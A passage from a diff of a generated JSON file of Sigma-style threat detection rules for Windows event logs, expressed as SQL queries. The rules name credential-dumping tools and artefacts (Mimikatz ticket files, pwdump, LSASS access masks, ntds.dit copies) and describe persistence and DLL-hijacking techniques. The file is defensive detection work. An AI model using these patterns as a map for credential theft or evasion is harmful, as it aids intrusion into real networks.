ESCAPE '\\' AND CertThumbprint LIKE '%' ESCAPE '\\') AND NOT ((IpAddress = '::1') OR (CertThumbprint = '')))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((TargetFilename LIKE '%.dot' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.doc' ESCAPE '\\' OR TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.rtf' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Word\\\\Startup%' ESCAPE '\\') OR ((TargetFilename LIKE '%.xlt' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.xls' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Excel\\\\Startup%' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\WINWORD.exe' ESCAPE '\\' OR Image LIKE '%\\\\EXCEL.exe' ESCAPE '\\')))" ], - "filename": "win_security_petitpotam_susp_tgt_request.yml" + "filename": "file_event_win_word_template_creation.yml" }, { - "title": "Defrag Deactivation - Security", - "id": "c5a178bf-9cfb-4340-b584-e4df39b6a3e7", + "title": "Mimikatz Kirbi File Creation", + "id": "9e099d99-44c2-42b6-a6d8-54c3545cab29", "status": "test", - "description": "Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group", - "author": "Florian Roth (Nextron Systems), Bartlomiej Czyz (@bczyz1)", + "description": "Detects the creation of files created by mimikatz such as \".kirbi\", \"mimilsa.log\", etc.", + "author": "Florian Roth (Nextron Systems), David ANDRE", "tags": [ - "attack.persistence", - "attack.t1053", - "attack.s0111" + "attack.credential_access", + "attack.t1558" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4701' AND TaskName LIKE '\\\\Microsoft\\\\Windows\\\\Defrag\\\\ScheduledDefrag' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%.kirbi' ESCAPE '\\' OR TargetFilename LIKE '%mimilsa.log' ESCAPE '\\'))" ], - "filename": "win_security_apt_slingshot.yml" + "filename": "file_event_win_hktl_mimikatz_files.yml" }, { - "title": "Important Scheduled Task Deleted/Disabled", - "id": "7595ba94-cf3b-4471-aa03-4f6baa9e5fad", + "title": "Legitimate Application Dropped Executable", + "id": "f0540f7e-2db3-4432-b9e0-3965486744bc", "status": "experimental", - "description": "Detects when adversaries stop services or processes by deleting or disabling their respective scheduled tasks in order to conduct data destructive activities", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects programs on a Windows system that should not write executables to disk", + "author": "frack113, Florian Roth", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.persistence", - "attack.t1053.005" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4699', '4701') AND (TaskName LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\Schedule%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\')) AND NOT ((EventID = '4699' AND SubjectUserName LIKE '%$' ESCAPE '\\' AND TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR Image LIKE '%\\\\visio.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordview.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR Image LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR Image LIKE '%\\\\finger.exe' ESCAPE '\\' OR Image LIKE '%\\\\notepad.exe' ESCAPE '\\' OR Image LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR Image LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\'))" ], - "filename": "win_security_susp_scheduled_task_delete_or_disable.yml" + "filename": "file_event_win_legitimate_app_dropping_exe.yml" }, { - "title": "Remote PowerShell Sessions Network Connections (WinRM)", - "id": "13acf386-b8c6-4fe0-9a6e-c4756b974698", + "title": "UAC Bypass Abusing Winsat Path Parsing - File", + "id": "155dbf56-e0a4-4dd0-8905-8a98705045e8", "status": "test", - "description": "Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound connections to ports 5985 OR 5986", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate use of remote PowerShell execution" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5156' AND DestPort IN ('5985', '5986') AND LayerRTID = '44')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winsat.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winmm.dll' ESCAPE '\\'))" ], - "filename": "win_security_remote_powershell_session.yml" + "filename": "file_event_win_uac_bypass_winsat.yml" }, { - "title": "Pass the Hash Activity 2", - "id": "8eef149c-bd26-49f2-9e5a-9b00e3af499b", - "status": "stable", - "description": "Detects the attack technique pass the hash which is used to move laterally inside the network", - "author": "Dave Kennedy, Jeff Warren (method) / David Vassallo (rule)", + "title": "Cred Dump Tools Dropped Files", + "id": "8fbf3271-1ef6-4e94-8210-03c2317947f6", + "status": "test", + "description": "Files with well-known filenames (parts of credential dump software or files produced by them) creation", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ - "attack.lateral_movement", - "attack.t1550.002" + "attack.credential_access", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.003", + "attack.t1003.004", + "attack.t1003.005" ], "falsepositives": [ - "Administrator activity" + "Legitimate Administrator using tool for password recovery" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4624' AND SubjectUserSid = 'S-1-0-0' AND LogonType = '3' AND LogonProcessName = 'NtLmSsp' AND KeyLength = '0') OR (EventID = '4624' AND LogonType = '9' AND LogonProcessName = 'seclogo')) AND NOT (TargetUserName = 'ANONYMOUS LOGON'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\pwdump%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\kirbi%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwhashes%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wce\\_ccache%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wce\\_krbtkts%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fgdump-log%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\test.pwd' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsremora64.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsremora.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fgexec.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wceaux.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SECURITY.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SYSTEM.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\NTDS.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DumpExt.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DumpSvc.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cachedump64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cachedump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pstgdump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\servpw.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\servpw64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwdump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Dumpy.exe' ESCAPE '\\')))" ], - "filename": "win_security_pass_the_hash_2.yml" + "filename": "file_event_win_cred_dump_tools_dropped_files.yml" }, { - "title": "Azure AD Health Service Agents Registry Keys Access", - "id": "1d2ab8ac-1a01-423b-9c39-001510eae8e8", + "title": "Creation Exe for Service with Unquoted Path", + "id": "8c3c76ca-8f8b-4b1d-aaf3-81aebcd367c9", "status": "test", - "description": "This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g AD FS).\nInformation from AD Health service agents can be used to potentially abuse some of the features provided by those services in the cloud (e.g. Federation).\nThis detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM:\\SOFTWARE\\Microsoft\\ADHealthAgent.\nMake sure you set the SACL to propagate to its sub-keys.\n", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "description": "Adversaries may execute their own malicious payloads by hijacking vulnerable file path references.\nAdversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.\n", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1012" + "attack.persistence", + "attack.t1547.009" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4656', '4663') AND ObjectType = 'Key' AND ObjectName LIKE '\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\ADHealthAgent' ESCAPE '\\') AND NOT ((ProcessName LIKE '%Microsoft.Identity.Health.Adfs.DiagnosticsAgent.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.InsightsService.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.MonitoringAgent.Startup.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.PshSurrogate.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Common.Clients.ResourceMonitor.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\program.exe' ESCAPE '\\')" ], - "filename": "win_security_aadhealth_svc_agent_regkey_access.yml" + "filename": "file_event_win_creation_unquoted_service_path.yml" }, { - "title": "Access Token Abuse", - "id": "02f7c9c1-1ae8-4c6a-8add-04693807f92f", + "title": "Suspicious Process Writes Ntds.dit", + "id": "11b1ed55-154d-4e82-8ad7-83739298f720", "status": "experimental", - "description": "This rule tries to detect token impersonation and theft. (Example: DuplicateToken(Ex) and ImpersonateLoggedOnUser with the LOGON32_LOGON_NEW_CREDENTIALS flag.)", - "author": "Michaela Adams, Zach Mathis", + "description": "Detects suspicious processes that write (copy) a Active Directory database (ntds.dit) file", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1134.001" + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.003" ], "falsepositives": [ - "Anti-Virus" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND LogonProcessName = 'Advapi' AND AuthenticationPackageName = 'Negotiate' AND ImpersonationLevel LIKE '\\%\\%1833' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\ntds.dit' ESCAPE '\\' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsl.exe' ESCAPE '\\'))" ], - "filename": "win_security_access_token_abuse.yml" + "filename": "file_event_win_susp_ntds_dit.yml" }, { - "title": "Generic Password Dumper Activity on LSASS", - "id": "4a1b6da0-d94f-4fc3-98fc-2d9cb9e5ee76", + "title": "Suspicious Get-Variable.exe Creation", + "id": "0c3fac91-5627-46e8-a6a8-a0d7b9b8ae1b", "status": "experimental", - "description": "Detects process handle on LSASS process with certain access mask", - "author": "Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update)", + "description": "Get-Variable is a valid PowerShell cmdlet\nWindowsApps is by default in the path where PowerShell is executed.\nSo when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.\n", + "author": "frack113", "tags": [ - "attack.credential_access", - "car.2019-04-004", - "attack.t1003.001" + "attack.persistence", + "attack.t1546", + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ - "Legitimate software accessing LSASS process for legitimate reason; update the whitelist with it" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4656' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (AccessMask LIKE '%0x40%' ESCAPE '\\' OR AccessMask LIKE '%0x1400%' ESCAPE '\\' OR AccessMask LIKE '%0x100000%' ESCAPE '\\' OR AccessMask LIKE '%0x1410%' ESCAPE '\\' OR AccessMask LIKE '%0x1010%' ESCAPE '\\' OR AccessMask LIKE '%0x1438%' ESCAPE '\\' OR AccessMask LIKE '%0x143a%' ESCAPE '\\' OR AccessMask LIKE '%0x1418%' ESCAPE '\\' OR AccessMask LIKE '%0x1f0fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f1fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f2fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f3fff%' ESCAPE '\\')) OR (EventID = '4663' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (AccessList LIKE '%4484%' ESCAPE '\\' OR AccessList LIKE '%4416%' ESCAPE '\\'))) AND NOT (((ProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\lsm.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\minionhost.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\VsTskMgr.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\GamingServices.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MRT.exe' ESCAPE '\\' OR ProcessName LIKE '%RtkAudUService64' ESCAPE '\\') AND (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysWow64\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysNative\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\') OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\taskhostw.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\CCM\\\\CcmExec.exe' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent-sc\\\\aurora\\\\%' ESCAPE '\\' AND ProcessName LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE '%\\\\x64\\\\SCENARIOENGINE.EXE' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND ProcessName LIKE '%\\\\avira\\_system\\_speedup.tmp' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%Local\\\\Microsoft\\\\WindowsApps\\\\Get-Variable.exe' ESCAPE '\\')" ], - "filename": "win_security_susp_lsass_dump_generic.yml" + "filename": "file_event_win_susp_get_variable.yml" }, { - "title": "Addition of Domain Trusts", - "id": "0255a820-e564-4e40-af2b-6ac61160335c", - "status": "stable", - "description": "Addition of domains is seldom and should be verified for legitimacy.", - "author": "Thomas Patzke", + "title": "Creation Of Non-Existent System DLL", + "id": "df6ecb8b-7822-4f4b-b412-08f524b4576c", + "status": "experimental", + "description": "Detects the creation of system dlls that are not present on the system. Usually to achieve dll hijacking", + "author": "Nasreddine Bencherchali (Nextron Systems), fornotes", "tags": [ + "attack.defense_evasion", "attack.persistence", - "attack.t1098" + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate extension of domain structure" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4706')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\WLBSCTRL.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\TSMSISrv.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\TSVIPSrv.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wow64log.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\WptsExtensions.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') OR TargetFilename LIKE '%\\\\SprintCSP.dll' ESCAPE '\\') AND NOT (Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\'))" ], - "filename": "win_security_susp_add_domain_trust.yml" + "filename": "file_event_win_create_non_existent_dlls.yml" }, { - "title": "Credential Dumping Tools Service Execution - Security", - "id": "f0d1feba-4344-4ca9-8121-a6c97bd6df52", - "status": "test", - "description": "Detects well-known credential dumping tools execution via service execution events", - "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "title": "DLL Search Order Hijackig Via Additional Space in Path", + "id": "b6f91281-20aa-446a-b986-38a92813a18f", + "status": "experimental", + "description": "Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...)\nbut with a space in order to trick DLL load search order and perform a \"DLL Search Order Hijacking\" attack\n", + "author": "frack113, Nasreddine Bencherchali", "tags": [ - "attack.credential_access", - "attack.execution", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006", - "attack.t1569.002", - "attack.s0005" + "attack.persistence", + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate Administrator using credential dumping tool for password recovery" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%fgexec%' ESCAPE '\\' OR ServiceFileName LIKE '%dumpsvc%' ESCAPE '\\' OR ServiceFileName LIKE '%cachedump%' ESCAPE '\\' OR ServiceFileName LIKE '%mimidrv%' ESCAPE '\\' OR ServiceFileName LIKE '%gsecdump%' ESCAPE '\\' OR ServiceFileName LIKE '%servpw%' ESCAPE '\\' OR ServiceFileName LIKE '%pwdump%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE 'C:\\\\Windows \\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files \\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files (x86) \\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.dll' ESCAPE '\\')" ], - "filename": "win_security_mal_creddumper.yml" + "filename": "file_event_win_dll_sideloading_space_path.yml" }, { - "title": "Tap Driver Installation - Security", - "id": "9c8afa4d-0022-48f0-9456-3712466f9701", - "status": "test", - "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques", - "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", + "title": "Potential Persistence Attempt Via ErrorHandler.Cmd", + "id": "15904280-565c-4b73-9303-3291f964e7f9", + "status": "experimental", + "description": "Detects creation of a file named \"ErrorHandler.cmd\" in the \"C:\\WINDOWS\\Setup\\Scripts\\\" directory which could be used as a method of persistence\nThe content of C:\\WINDOWS\\Setup\\Scripts\\ErrorHandler.cmd is read whenever some tools under C:\\WINDOWS\\System32\\oobe\\ (e.g. Setup.exe) fail to run for any reason.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1048" + "attack.persistence" ], "falsepositives": [ - "Legitimate OpenVPN TAP insntallation" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%tap0901%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\WINDOWS\\\\Setup\\\\Scripts\\\\ErrorHandler.cmd' ESCAPE '\\')" ], - "filename": "win_security_tap_driver_installation.yml" + "filename": "file_event_win_persistence_error_handler_cmd.yml" }, { - "title": "Win Susp Computer Name Containing Samtheadmin", - "id": "39698b3f-da92-4bc6-bfb5-645a98386e45", + "title": "VsCode Powershell Profile Modification", + "id": "3a9fa2ec-30bc-4ebd-b49e-7c9cff225502", "status": "experimental", - "description": "Detects suspicious computer name samtheadmin-{1..100}$ generated by hacktool", - "author": "elhoim", + "description": "Detects the creation or modification of a vscode related powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "cve.2021.42278", - "cve.2021.42287", "attack.persistence", "attack.privilege_escalation", - "attack.t1078" + "attack.t1546.013" ], "falsepositives": [ - "Unknown" + "Legitimate use of the profile by developers or administrators" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((SamAccountName LIKE 'SAMTHEADMIN-%' ESCAPE '\\' AND SamAccountName LIKE '%$' ESCAPE '\\') OR (TargetUserName LIKE 'SAMTHEADMIN-%' ESCAPE '\\' AND TargetUserName LIKE '%$' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Microsoft.VSCode\\_profile.ps1' ESCAPE '\\')" ], - "filename": "win_security_susp_computer_name.yml" + "filename": "file_event_win_susp_vscode_powershell_profile.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation - Security", - "id": "fd0f5778-d3cb-4c9a-9695-66759d04702a", - "status": "experimental", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "title": "WMI Persistence - Script Event Consumer File Write", + "id": "33f41cdd-35ac-4ba8-814b-c6a4244a1ad4", + "status": "test", + "description": "Detects file writes of WMI script event consumer", + "author": "Thomas Patzke", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.t1546.003", + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Dell Power Manager (C:\\Program Files\\Dell\\PowerManager\\DpmPowerPlanSetup.exe)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ServiceFileName REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ServiceFileName REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ServiceFileName REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ServiceFileName REGEXP '\\\\*mdr\\*\\W\\s*\\)\\.Name' OR ServiceFileName REGEXP '\\$VerbosePreference\\.ToString\\(' OR ServiceFileName REGEXP '\\String\\]\\s*\\$VerbosePreference'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\scrcons.exe' ESCAPE '\\')" ], - "filename": "win_security_invoke_obfuscation_obfuscated_iex_services_security.yml" + "filename": "file_event_win_wmi_persistence_script_event_consumer_write.yml" }, { - "title": "Security Eventlog Cleared", - "id": "d99b79d2-0a6f-4f46-ad8b-260b6e17f982", - "status": "test", - "description": "One of the Windows Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", - "author": "Florian Roth (Nextron Systems)", + "title": "LSASS Process Dump Artefact In CrashDumps Folder", + "id": "6902955a-01b7-432c-b32a-6f5f81d8f625", + "status": "experimental", + "description": "Detects the presence of an LSASS dump file in the \"CrashDumps\" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process.", + "author": "@pbssubhash", "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "car.2016-04-002" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", - "System provisioning (system reset before the golden image creation)" + "Rare legitimate dump of the process by the operating system due to a crash of lsass" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '517' AND Provider_Name = 'Security') OR (EventID = '1102' AND Provider_Name = 'Microsoft-Windows-Eventlog')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 